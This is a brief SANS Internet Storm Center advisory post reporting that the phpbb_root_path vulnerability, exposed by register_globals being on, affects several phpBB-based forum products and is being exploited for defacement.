Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Classic phpBB vulnerability impacts phpBB-based forums - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Classic phpBB vulnerability impacts phpBB-based forums
It seems fairly obvious but the classic phpbb_root_path vulnerability is present in products such as: Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB and Xero Portal.  All are affected by the vulnerability exposed by having register_globals set to "on."  It appears that it is being regularly exploited as well to deface systems.
www.heise-security.co.uk/news/84732
Thanks for the lead Juergen!
Kevin Liston

292 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!